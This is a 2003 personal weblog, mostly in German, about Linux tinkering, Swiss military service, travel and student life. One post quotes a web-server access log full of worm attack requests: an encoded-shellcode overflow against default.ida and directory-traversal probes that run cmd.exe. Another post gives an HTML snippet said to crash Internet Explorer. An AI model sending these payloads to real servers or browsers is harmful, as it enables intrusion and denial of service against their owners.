Categories

Links

License

Creative Commons License

Unless otherwise expressly stated, all original material of whatever nature created by and included in this weblog is licensed under a Creative Commons License.

30.12.2003

Mandrake

Auf dem alten Pentium II meiner Eltern habe ich gestern Mandrake Linux 9.2 installiert.
Nun taucht plötzlich folgendes Problem auf: In X funktioniert die Maus nicht (/dev/psaux und /dev/mouse ist "busy") und das Netzwerk will auch nicht mehr. Wenn ich beim Booten das Starten des eth0-Interfaces überspringe, funktioniert die Maus, aber das Netzwerk will auch nach manuellem initialisieren nicht funktionieren.
Die Maus ist eine PS/2 Logitech, und die Netzwerkkarte eine ISA-3Com-3c509 (das entsprechende Kernelmodul lädt ohne Fehlermeldung oder ähnliches). Irgendwelche Ideen? Lösung?

Mandrake benutzt eine RPM-basierte Packetverwaltung. Defaultmässig sind dort nur die Pakete auffindbar, die auf der Installations-CD sind. Da ich aber nur die erste Installations-CD besitze, habe ich auf ftp://sunsite.cnlab-switch.ch/mirror/mandrake ein bisschen rumgeschaut und die URLs und die hdlist.cz Dateien in die Mandrake-Paketverwaltung integriert, so dass ich Zugriff auf (alle?) Mandrake-Pakete habe. Jedoch habe ich auch dort einige Pakete nicht gefunden. So fehlen mir immernoch der Acrobat Reader und der Flashplayer etc. Weiss zufällugerweise jemand, wo ich diese finden kann?

16:02 | Linux | Permalink

28.12.2003

SwissBlogs

SwissBlogs.com est une liste des weblogs suisses qui contient maintenant aussi mon weblog. ce truc est fondé par Stephanie Booth.

01:00 | Misc | Permalink

46° 33' 18", 7° 22' 13"

Dank Maporama weiss ich nun ungefähr meine Koordinaten und habe mich nun auch bei GeoURL eingetragen.

00:30 | Misc | Permalink

24.12.2003

Comme chaque année

Bonnes fêtes

16:13 | Misc | Permalink

Alle Jahre wieder

Schöne Feiertage allerseits

16:11 | Misc | Permalink

23.12.2003

Linux on Mac

Beim dritten Anlauf ist es endlich gelungen: Linux läuft mit X und Sound auf dem PowerBook :-)
Als Distribution dient wieder Gentoo. Dank dem 2.6er-Kernel funktioniert der Sound mit ALSA nach einem insmod out of the box. Als WindowManager kommt Kahakai, ein Blackbox/Fluxbox/Waimea-Clone zum Einsatz; Enlightenment, ratpoison, evilwm, pwm und pekwm will ich aber auch noch ausprobieren.

Leider ist der WLAN-Chip der Airport Extreme-Karte von Broadcom, welche ja bekanntlich keine Treiber für Linux haben. Auch der Erfolg des NdisWrapper bringt mich nicht weiter, da zwar der gleiche Chip in der Karte steckt jedoch der NdisWrapper nur auf x86 funktioniert :-(
Mal schauen ob ich noch das SuperDrive zum brennen kriege...

Aqua on Linux

00:25 | Linux | Permalink

10.12.2003

Battlecry

What Is Your Battle Cry?

Prowling across the mini-mall parking lot, cutting down all who dare stand in the way using gilded boxing gloves, cometh X-way! And he gives a spectacular cry:

"For the love of carnage and discord, I tear into the enemy until Satan himself emerges from the pit to thank me!"

Find out!
Enter username:
Are you a girl, or a guy ?

created by beatings : powered by monkeys



Gefunden bei mk

08:15 | Misc | Permalink

06.12.2003

Photo vom Panther

Ein hübsches Bildchen von meinem neuen Gerät:
Sylpheed läuft auf einem anderen Rechner (nuntia) und die X11-Ausgabe wird via SSH zum X11 vom Mac umgeleitet. Davor das Terminal mit der SSH-Session und das Terminal vom Mac. Dahinter noch Safari, der KHTML-basierte Browser von Apple. Zuunterst das "berühmte" Dock.

Und nun startet der Installationsversuch Nummer 2 von Linux. Diesmal mit einer seperaten /boot-Partition und vermutlich auch gerade Kernel 2.6...

01:14 | Linux | Permalink

05.12.2003

Wieder mal was zum Gentoo



Weitere solche Comics bei es.comp.os.linux.*

12:03 | Linux | Permalink

27.11.2003

argyraspides

Da sich nun der Adrelaninsturm ein bisschen gelegt hat, folgendes:
Seit gestern Mittag habe ich nun auch so einen tragbaren Computer, ein Apple PowerBook G4 15 Zoll mit Superdrive um etwas genauer zu sein.
Das GUI ist sehr schön, jedoch sehr oft nur eine Spielerei, die nicht wirklich nützlich ist.
Was mir gefällt ist, dass man mit Bluetooth fast ganz einfach die Adressdaten, Kalender etc. vom Natel zum Computer kopieren kann und umgekehrt.
Weitere Erfahrungsberichte werden sicher folgen :-)

09:52 | Mac | Permalink

23.11.2003

Wochenende

Am Freitag war ich mit ein paar Kollegen von der EPFL an der Nacht der Kurzfilme in Lausanne. Da liefen von 20 Uhr an ungefähr 50 Kurzfilme und um 5 Uhr am Morgen gabs für alle, die solange ausgeharrt hatten, noch Café & Croissants.

Nach 2 Stunden Schlaf gings dann wieder auf, um den ganzen Tag am Installfest der GNU Generation (Verein von Studenten der EPFL zur Promotion von GNU/Linux und freier Software) als GI mitzuhelfen; d.h. ganz vielen Leuten helfen GNU/Linux zu installieren und jenste Hardwareteile zum Funktionieren überreden.

12:02 | Misc | Permalink

15.11.2003

Feines Dessert

Gerade zum besten Desser erkohren:
Vermicelle mit Schockoladencrème und Schlagrahm
Einfach spitze :-)

17:39 | Misc | Permalink

14.11.2003

Shipped !!!



Endich! Am Abend des 13. Novembers durfte ich entdecken, dass mein Packet die Fabrik in Irland verlassen hat *freu*
Leider funktionieren die angegebenen Trackingnummern nicht :-(

21:09 | Misc | Permalink

08.11.2003

CSS Links

Bei mk ein paar (ältere) CSS Links gefunden:
Little Boxes
CSS @ Maxdesign
CSS horizontal navigation list
:hover mit beliebigen Elementen
pure CSS menus

17:42 | Webdesign | Permalink

Weltweites Warten

Bestellungen über das WWW sind in der Regel innert ein paar Tagen da. Jedoch diese Bestellung lässt auf sich warten: Nun sind schon fast zwei Wochen vergangen und es ist immernoch das gleiche Bild:

Being Assembled

02:34 | Misc | Permalink

02.11.2003

Zurück im Zivilleben

Nun ist für eine (hoffentlich) lange Zeit fertig mit solchen komischen Verkleidungen; die 15 Wochen RS sind vorbei.

Während der RS sah ich so aus, nach der RS wieder so (natürlich ohne das grüne Faschingskostüm) und in der letzten Woche so, was jedoch meinen Vorgesetzten nicht so gefiel und daher nur einen halben Tag lang dauerte :-)

Und nun studiere ich an der EPFL bis auf weiteres Informatik.

10:51 | Misc | Permalink

18.10.2003

Journée d'acceuil

Hier j'étais à la journée d'acceuil à l'EPFL. Où je commence le 27 octobre mes études en informatique.
À la fin de cette journée il y avait une apéro. Est-ce que c'est toujours comme ça?

22:29 | School | Permalink

12.10.2003

www.loozer.ch

Erst heute entdeckt: www.loozer.ch, die Website von nem Kameraden aus der RS. Dort findet mensch unter anderem interessante Texte zu Verschlüsselung, E-Mail-Verkehr, proprietäre Dateiformate, Datenschutz, Gnu/Linux etc.

17:23 | Misc | Permalink

28.09.2003

What kind of thinker are you?

What kind of thinker are you?

Ich bin ein 'Spatial Thinker', experimetierfreudiger Bastler halt ;-)

Gesehen bei mk, sec und rw

19:40 | Misc | Permalink

Zug Frey in Action

Jede Menge Militärphotos und -videos von unserem Zug gibts hier.

19:21 | Misc | Permalink

22.09.2003

15 min. (Ent)spannung

Flashgame im Mysth-Stil gefunden bei symlink.ch

12:16 | Misc | Permalink

21.09.2003

Closed Air 03

Gestern war ich mit ein paar Kameraden ausm Militär hier und es war voll geil!

23:44 | Music | Permalink

14.09.2003

Schneewittchen auf türkisch

Damit hier wieder mal was neues steht: Schneewittchen auf türkisch, geklaut bei vowe.

16:22 | Misc | Permalink

03.08.2003

Grosser Urlaub

So, 'grosser' Urlaub, vom 1.8. 13:30 bis 4.8. 23:45. Ich werde wohl wie schon letztes Wochenende die ganze Zeit schlafen.
Mein PC läuft seit dem letzten Samstag auch nur noch mit Knoppix, aber da Gentoo 1.4 erst am 5.8. rauskommt warte ich noch mit neuaufsetzen.

Wer Karten, Briefe oder Pakete erhalten will, soll sich melden, aber viel mehr als solche Sprüche sind nicht zu erwarten:

Wir marschieren über Felder
WIr marschieren über Saat
Wir verblöden organisiert
Und alles zahlt der Staat!

Ich kenn einen Ort, wo keine Sonne lacht
einen Ort wo man aus Menschen Maschinen macht
einen Ort ohne Moral und Tugend
die RS das Grab deiner Jugend!

02:46 | Misc | Permalink

20.07.2003

FtS

Nach einer Woche im Militär ist die Motivation schon fast in den Minusbereich gefallen, die weiteren 14 Wochen werden sicher lustig :-(
Wer die Motivation etwas steigern will, kann mir etwas zuschicken:

Rekr Jaggi Andreas
Kp III Zug 4
Uem RS 262
Kaserne
8302 Kloten

Bis 5 kg ist das Paket gratis (vermutlich nur in CH), sofern 'Feldpost' draufsteht.

14:55 | Misc | Permalink

12.07.2003

Bunt

Zurück aus den Ferien, konnte ich endlich einmal wieder vor meinen Computer sitzen *g*
Dieser Screenshot zeigt, was dabei herausgekommen ist:

- Farbige Terminals
aterm -tr -sh 75 -rv +sb -tint blue
- Farbiger Prompt
PS1='\[\033[1;30m\][ \[\033[01;32m\]\u\[\033[0;37m\] @ \[\033[01;32m\]\h \[\033[0;37m\]: \[\033[01;34m\]\w\[\033[1;30m\] ] \[\033[0;37m\]\$ \[\033[01;00m\]'
- Farbiges ls
alias ls="ls --color=auto"
- Farbtabelle für die Shell: colors

- Informative Titelleisten
PROMPT_COMMAND='echo -ne "\033]2;$USER@$HOSTNAME: $PWD ($_)\007"'

13:51 | Linux | Permalink

05.07.2003

Ferien zum 2. und '3.' (RS), Zukunft

Nachdem ich erst gerade aus Dänemark zurück bin, fahre ich in etwa 4 Stunden mit meiner Familie für eine Woche in die Ferien nach Brüssel. Gerade anschliessend beginnt dann die Rekrutenschule, welche am 24. Oktober endet. Am 20 Oktober beginnt das Studium an der EPFL, verpasse ich also schon zum Anfang was :-(

00:12 | Misc | Permalink

04.07.2003

Guide to GNU/Linux Desktop Survival

Dank diesem reichhaltigen Guide habe ich es wieder geschafft, meinen Drucker zum Laufen zu bringen, nachdem ich es, wegen der nicht gemachten Dokumentation vom letzten mal, nochnicht geschafft hatte.

11:03 | Linux | Permalink

01.07.2003

back @ home

So, ich bin zurück aus Dänemark. Es war schön und hatte sogar genügend Sonne, dass ich mir nen Sonnenbrand geholt habe.
Besonders die 21-stündige Rückreise war sehr abenteuerlich, da bei wirklich jedem Umsteigen alle Züge Verspätung hatten...

Karte von Dänemark und Deutschland

Unsere Rückreise startete ganz normal mit einer einstündigen Busfahrt von Faaborg nach Odense (14.04 bis ca. 15.00). In Odense sollte unser Zug um 16.04 fahren, damit wir in Kollding in den IC nach Hamburg wechseln konnten.
Jedoch erfahren wir in Odense etwas vor 16 Uhr eher zufällig, dass der Zug nach Kollding so viel Verspätung hat, dass wir den IC nach Hamburg nicht mehr erreichen können. Unser erster Gedanke: Scheisse, nächster Zug erst in 24 Stunden.
Da aber noch andere Passagiere in dieser Situation waren, hat ein dänischer "Reiseleiter" (er begleitete zwei Jugendliche aus Ohaio an den Bahnhof) mit dem Bahnpersonal ausgehandelt, dass die Dänische Bahn ein Taxi bezahlt, das uns bis nach Kollding bringt, damit wir den IC nach Hamburg noch erreichen.
Gut, das Taxi kommt, mittlerweile ist es schon 16.22 und der IC in Kollding fährt um 16.47. Der Taxifahrer hat folgende Anweisung bekommen: 'Drive like hell!' und wir sind losgefahren.
Als wir erst um ungefähr 17 Uhr in der Nähe von Kollding sind, entscheidet der Taxifahrer, dass wir zur nächsten Station fahren, wo der IC hält, Flensburg (etwa 200km von Odense entfernt). Wir fahren nach Flensburg und haben dort etwa 10 Minuten vorsprung auf den Zug. Jedoch entscheidet der Taxifahrer weiterzufahren, da es vermutlich nicht möglich ist, in 10 Minuten von der Autobahn bis zum Bahnhof zu gelangen, und wenn wir dann dort wären und den Zug verpasst hätten, so müssten wir noch viel mehr Zeit aufholen.
Also rasen wir weiter, über die Grenze, wo der Taxifahrer feststellt, dass er das erste mal mit dem Taxi in Deutschland ist. Nächstes Ziel ist Hamburg (etwa 180 km von Flensburg entfernt). Dort würde unser nächster Zug (CityNightLiner nach Zürich) um 20.19 fahren.
Als wir auf Neumünster zufahren, haben wir 25 Minuten Vorsprung auf den Zug und der Taxifahrer entscheidet, hier zum Bahnhof zu fahren anstatt sich in Hamburg durch das städtische Verkehrschaos zu zwängen. Mittlerweile ist es fast 19 Uhr. Wir sind nun schon 3 Stunden Taxi gefahren, die Dänische Bahn wird sich sicher über die Rechnung freuen *bg*
Wir finden den Bahnhof ziemlich leicht und die Leute staunen nicht schlecht, als sie ein dänisches Taxi sehen *g*
Mit ein paar Minuten Verspätung fährt der dänische IC dann ein und wir steigen endlich in den Zug ein, in dem wir schon seit 2,5 Stunden sein sollten.
Mit einer kleinen Verspätung kommen wir in Hamburd-Dammtor an, was jedoch nicht weiter schlimm ist, da wir dort sowiese eine halbe Stunde Aufenthalt hätten.
Um 20.24 kommt der CityNightLiner mit 5 Minuten Verspätung, die sich noch vergrössern werden. Wir beziehen unsere Sleeperette (= Liegesessel) und freuen uns, dass wir uns endlich etwas erholen können :-)
Die Zugfahrt quer durch Deutschland verläuft wortwörtlich wie im Schlaf *g*
Als wir jedoch am Morgen aufwachen kommt der Zug mit 20 Minuten Verspätung um 7.16 anstatt umd 6.56 in Basel an und wir verpassen unseren Zug, der um 7.04 gefahren ist.
Nach einer Stunde rumhängen im Bahnhof Basel, nehmen wir den Zug um 8.04 Richtung Bern, Thun, Spiez, Interlaken.
Um 9.58 steige ich in Spiez aus dem Zug aus und warte auf meinen Anschlusszug der um 10.02 fahren sollte. Als um 10.03 immernoch kein Zug da ist, höre ich die Durchsage: "Der Goldenpass Express nach Zweisimmen, planmässige Abfahrt 10.02 folgt in circa 5 Minuten"
Nach etwa 10 Minuten kommt der Zug und ich beginne auch die letzte Etape meiner Heimreise. In Zweisimmen komme ich schliesslich mit 15 Minuten Verspätung um 10.55 an, was mir jedoch nichts mehr ausmacht, da ich keine weiteren Anschlusszüge erreichen muss und nach 21 Stunden reisen sowieso nur noch in Bett fallen kann ;-)

23:10 | Misc | Permalink

20.06.2003

Dänemark ich komme

Wie gi neulich, starte ich auch ne grosse Postkartenaktion *g*
Wer also ne Karte will, soll mir bis 14 Uhr seine Adresse mitteilen (die ohne http:// ;-)

12:20 | Misc | Permalink

19.06.2003

Maturareise

Morgen um 16.18 Uhr fahre ich mit meiner Klasse nach Dänemark auf die Maturareise.
Ich melde mich dann im Juli wieder :-)

22:24 | School | Permalink

16.06.2003

dumdidum

Da hab ich nun mit nem 486 nen superleisen 'Server' gebastelt und kaum den Apache installiert und alles eingerichtet, schon sieht's im accesslog so aus:

192.168.23.6 - - [15/Jun/2003:17:58:38 +0200] "GET / HTTP/1.1" 200 71 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4b) Gecko/20030605 Mozilla Firebird/0.6"
(Mein erster Zugriff, davon hats natürlich noch n paar mehr *g*)

212.156.34.148 - - [15/Jun/2003:21:39:49 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 266 "-" "-"
212.174.107.18 - - [15/Jun/2003:23:24:03 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 266 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:21 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:22 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:22 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:22 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:25 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 276 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 276 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
212.181.34.130 - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"

02:18 | Networking | Permalink

14.06.2003

Jaaaaaaaaaaaaa...

Nun habe auch ich die Maturitätsprüfungen erfolgreich überlebt. Und mit mir auch alle anderen!
In der Regel fallen 2-3 durch, doch diesmal haben alle bestanden!
84 ist halt einfach der beste Jahrgang *g*

11:36 | School | Permalink

11.06.2003

Web Developer extension for Mozilla Firebird

Ist mir gerade bei CSS-Technik-News ins Auge gestochen, dass es jetzt noch weh tut: Web Developer extension for Mozilla Firebird

01:35 | Webdesign | Permalink

06.06.2003

gammel

Da's ja alle Welt macht, muss ich wohl mitziehen *g*
Southpark Selfmade
Via Drey, rw und mk

Gymnasium - Apathie erleben!

00:43 | Misc | Permalink

04.06.2003

Happy Birthday x-log

Ich habe es natürlich wieder verschlafen:
Vorgestern vor einem Jahr hatte ich den ersten (Test)Eintrag, der unterdessen verschwunden ist, ins Weblog geschrieben. Der zweite Eintrag findet man hier.
Nun habe ich schon ein Jahr lang das Internet mit meinem Gebrabel belästigt und habe nicht vor damit aufzuhören *fg*

Wer sich beschweren oder gratulieren will, voilà: happybirthday Affenschwanz x-log Punkt waterwave Punkt ch

Torte

13:34 | Misc | Permalink

23.05.2003

Fuck

Ich hab wieder einmal meinen Computer zu Schrott gemacht.
Als ich am CD-Brennen war, ist plötzlich alles eingefroren, nichteinmal ctrl+alt+backspace zum abscheissen von X hat funktioniert. Leider hat aber irgendetwas ununterbrochen auf die Festplatte zugegriffen. Als ich dann eine Stunde später wieder alles gleich vorfand, habe ich versucht mittels Büroklammer und diesem Resetlöchlein am CD-Brenner das Ding abzubrechen; ging in die Hose: irgendwie kam die CD ausm Gleichgewicht und hat im CD-Brenner zwar weiterhin gedreht, aber an allen Enden und Ecken angeschlagen, sprich CD-Brenner demoliert. Das hat natürlich nen riesigen Krach verursacht und so nach 5 Minuten konnt ichs nicht mehr länger ertragen, und auch meine Nachbarn hats wahrscheinlich nicht gerade gefreut (es war ca. Mitternacht). Also hab ich den Resetknopf am Gehäuse gedrückt, so dass die Festplatte immernoch mit Strom versorgt wurde -> vermutlich kein Headcrash.
Als das System neu bootete, verlief alles eigentlich normal, nur dass ich nach dem Login / nicht finden konnte also nix mit /sbin/shutdown -h etc. einfach weg. Also noch einmal resetet, und da wird der Kernel geladen, bis er dann mit dieser wunderschönen Fehlermeldung aufhört:

Kernel panic: VFS: Unable to mount root fs on 03:03

Und dann hab ich den Rechner abgestellt (am Netzteil) und den Stecker rausgezogen.

21:41 | Tech | Permalink

21.05.2003

Kein Titel

Wieder einmal ein Screenshot.

Chaos A.D.
Tanks On The Streets
Confronting Police
Bleeding The Plebs
Raging Crowd
Burning Cars
Bloodshed Starts
Who'll Be Alive?!

Chaos A.D.
Army In Siege
Total Alarm
I'm Sick Of This
Inside The State
War Is Created
No Man's Land
What Is This Shit?!

Refuse/resist
Refuse

Chaos A.D.
Disorder Unleashed
Starting To Burn
Starting To Lynch
Silence Means Death
Stand On Your Feet
Inner Fear
Your Worst Enemy

Refuse/resist

10:26 | Misc | Permalink

13.05.2003

Menuet OS

Gerade beim Schockwellenreiter entdeckt und ausprobiert: Menuet OS

Ein 32-Bit-Echtzeit-Betriebssystem mit GUI, komplett in Assembler geschrieben, welches auf einer einzigen Floppy Platz findet!

18:27 | Linux | Permalink

05.05.2003

f.waterwave.ch

f.waterwave.ch ist nun die Website unserer Klasse doch noch etwas geworden.
Zuerst schien es ja so, als ob nie mehr etwas geschehen würde, doch in der letzten Schulwoche (von drei Jahren) haben wir es doch noch geschafft ;-)

Ist 'quick and dirty' programmiert aber noch lange nicht fertig...

00:39 | School | Permalink

29.04.2003

Gentoo install.sh

install.sh mein kleines Shell-Script um die Installation von Gentoo etwas zu automatisieren *g*

Der erste Parameter ist der zu kompilierende Kernel (gentoo-sources, gaming-sources, vanilla-sourves oder was auch immer) default ist gentoo-sources. Der zweite Parameter legt fest, wohin gelogt wird, default ist /root/status. Der dritte Parameter legt fest, ob und welche make.conf nach /etc/make.conf kopiert wird.
Alle Parameter sind optional, will man jedoch den zweiten Parameter verwenden, so muss der erste auch gesetzt werden, ebenso für den dritten, aber das sollte eigentlich klar sein ;-)

Und ja, es ist keinsterweise irgendwie schön programmiert, da es nur mal so ein Versuch war, den aber gewisse Leute unbedingt sehen wollen *g*

20:58 | Linux | Permalink

26.04.2003

Gentoo auf 486 mit Stage 1

Da ich ja genügend Zeit habe, den Rechner dauernd laufen zu lassen, habe ich Gentoo auf meinem alten 486er installiert, resp. bin noch dran ;-)

Und damit ich so weiss wie lange das ganze dauert habe ich ein simples Shell-Script geschrieben, dass mir die Bootstrap, emerge system, emerge sync, emerge -u world und emerge sys-kernel/gentoo-sources ausführt und jeweils die Uhrzeit in eine Datei schreibt. Herausgekommen ist nun folgendes:

Beginn Bootstrap
Wed Apr 23 03:49:00 CEST 2003
Beginn emerge system
Fri Apr 25 05:46:54 CEST 2003
Beginn emerge sync
Sat Apr 26 07:59:05 CEST 2003
Beginn emerge -u world
Sat Apr 26 08:21:35 CEST 2003
Beginn emerge sys-kernel/gentoo-sources
Sat Apr 26 08:21:35 CEST 2003
Finished
Sat Apr 26 09:18:42 CEST 2003

Natürlich dauerte das emerge system "nur" so kurz, weil es ein Minimalsystem ohne graphische Oberfläsche etc. ist, insgesamt 76 Packages!

11:27 | Linux | Permalink

23.04.2003

Bei rm hab ich gerade 'n netten IE-Bug gefunden, der nur mit HTML den IE zum Absturz bringt.
Natürlich musste ich das gleich ausprobieren und nun seht selbst, was aufm Computer meiner Eltern (jep, bei mir hat es nur noch Linux!) passiert ist *eg*

Screenshot

Selber machen

<html>
<form>
<input type crash>
</form>
</html>

02:42 | Misc | Permalink

20.04.2003

Ferienstress

Nach Gymerfest und einer sonnigen Woche in Gumaglio im Maggiatal im Tessin, in der wir leider nur für die anstehenden Maturaprüfungen lernten, steht jetzt die zweite Ferienwoche bevor, in der ich wieder so viel zu tun habe, dass wahrscheinlich nicht mehr viel Zeit fürs Internet, Weblog etc. übrigbleibt.
Ich versuche nicht wie rm gleich alles einzustellen (was für mich sicher auch die bessere Wahl wäre *g*), sondern quasi live ausm Prüffungsstress euch etwas mitzuteilen, dies jedoch nicht mehr so oft wie auch schon ;-)

03:25 | Misc | Permalink

05.04.2003

XPde

Heute habe ich XPde ausprobiert. Es ist ein dem Windows XP old-style Look nachempfundener Window-Manager.
Sieht nett aus, hat aber noch einige Bugs (daher ist es bei Portage auch noch gemasked).

Monitorschuss?

17:44 | Linux | Permalink

02.04.2003

Mozilla macht Kaffee

Bei einigen Unix-Distributionen (Debian, Gentoo, Solaris...) will Mozilla/Phoenix nicht mit dem Plugin der auf dem System installierten Java-VM zusammenarbeiten und verlangt den Download einer eigenen Java-VM. Ich habe bisher schon viele verschiedenen Lösungsansätze gesehen, jedoch hat bei mir noch keiner funktioniert :-)
Vorhin jedoch ist über die LUGS-Mailingliste gerade einer ins Postfach geflattert, der so simpel wie funktionstüchtig ist:

Anstatt die ganze Plugin-Geschichte herumzukopieren oder herumzuinstallieren, macht man einfach im /usr/lib/phoenix/plugins oder /usr/lib/mozilla/plugins Verzeichnis einen Link (libjavaplugin_oji.so) zu /JAVAPFAD/xx/yy/zz/javaplugin_oji.so, variert je nach Distribution und Java-VM!

Bei mir funktioniert nun Java endlich auch im Phoenix *freu*

22:40 | Linux | Permalink

01.04.2003

April, April!

Für alle, die sich morgen über die abstrusesten Zeitungsartikel wundern.

00:25 | Misc | Permalink

29.03.2003

uptime

uptime

15:13 | Linux | Permalink

Informationen zum Thema Spam

Aus aktuellen Anlass (ich habe Spam direkt von der Domain unserer Schule bekommen!) habe ich mich noch einmal ein bisschen umgeschaut und bin auch fündig geworden.

Informationen zum Thema Spam (inkl. Antwortvorlage für die Schweiz!)
Artikel im Saldo (kostenpflichtig)

01:28 | Misc | Permalink

28.03.2003

SelfLinux

So wie SelfHTML für HTML gibt es auch SelfLinux. Befindet sich momentan noch im Aufbau, bietet aber trotzdem schon einige nützliche Informationen.

01:18 | Linux | Permalink

26.03.2003

Bush, Blair, assasins, mais l'ONU ne fait rien!

Chronik eines angekündigten Krieges

PACE

WANTED

Weitere PDFs zur Weltpolitik findet man hier und hier.

23:34 | Misc | Permalink

23.03.2003

So siehts aus

gi hat ein Bild der Welt gemacht.

21:27 | Misc | Permalink

22.03.2003

Tous ensemble, tous ensemble, non à la guerre!

Jeudi et vendredi j'étais à Lausanne pour visiter les 'journées des gymnasien(ne)s' à l'EPFL. Bon, je pense que je ferais là mes études.
Déjà à 9 heures le matin, en traversant la place de la gare on entendait 'les voix de la manifestation' mais je n'avais pas le temps pour y participer. Le vendredi je me suis bien informé sur les études en informatique. Donc aujoud'hui je suis allé à Berne à la manifestation nationale contre la guerre.

21:17 | Misc | Permalink

16.03.2003

Auch Programmierer sind Menschen

checking for something to drink while compiling... err: no fridge found

Ist mir gerade beim installieren von TiLP aufgefallen :-)

13:42 | Coding | Permalink

12.03.2003

Tada

Nachdem ich letztens meine Platte zerlöchert habe, hab ich nun alles Partitionen darauf platt gemacht und Gentoo ganz neu installiert.

Screenshot

15:09 | Linux | Permalink

Heisenbergsche Raum-Zeit-Unschärfe

Dies und weiteres solches Zeugs heben wir gerade im Physik durchgenommen. Und im übertragenen Sinn könnte ich es auch gerade auf mein momentanes Leben anwenden.
Letzte Woche hatte ich die ganze Zeit Proben und diese Woche kommt es so, dass andauernd Lektionen ausfallen und ich pro Tag manchmal nur gerade 2 Lektionen in die Schule gehe und mich dann wieder nach Hause begeben kann. Bei einem einstündigen Schulweg, ist also die für die Schule aufgewendete Tara-Zeit grösser als die Netto-Zeit!

14:07 | School | Permalink

06.03.2003

Schule und so

Ich bin wieder einmal einen 'Vortrag' am vorbereiten, diesmal in Geschichte, dass ich ja bekanntlich auf französisch durchexerziere ;-)

Und wie alle sicher schon wissen, bin ich wieder einmal besonders früh besonders weit. Sprich: ich habe jetzt erst einen Drittel gemacht und muss um 5 Uhr schon wieder aufstehen...

So, nun ist genug Selbstmitleid geflossen, jetzt sollte ich wieder weitermachen.

Hier hats viele lustige Mods. Vielleicht sollte ich noch erwähnen, dass ich erstmals an meinem Computer herumgelötet hab, genauer am Netzteil. Ich hab nämlich die Lüfter rausgelötet und zwei superleise 12db-1500rpm-Papst-Lüfter reingelötet. Und, das Überraschendste: es läuft noch und zwar angenehm leise *g*

01:06 | Misc | Permalink

01.03.2003

Nachtrag zu Linux - Windows

Nach kurzem Testen muss ich ein Lob für Ext2Fsd (Ext2 File System Driver) schreiben. Damit und mit dem dabei mitgebrachten mount-Utility kann man eine Ext2/3-Partition ganz einfach mit einem beliebigen Laufwerksbuchstaben quasi in den 'Arbeitsplatz' mounten ;-)
Natürlich funktioniert das auch mit Win-Partitionen.

Desweiteren werde ich gleich SwapFs ausprobieren, das eine Linux-Swap-Partition unter Windows dem Auslagerungsspeicher zur Verfügung stellen soll.

Und vielleicht kann jemand dieses Tutorial (Booting Linux from the NT boot loader) gebrauchen, ich habe mich für GRUB entschieden :-)

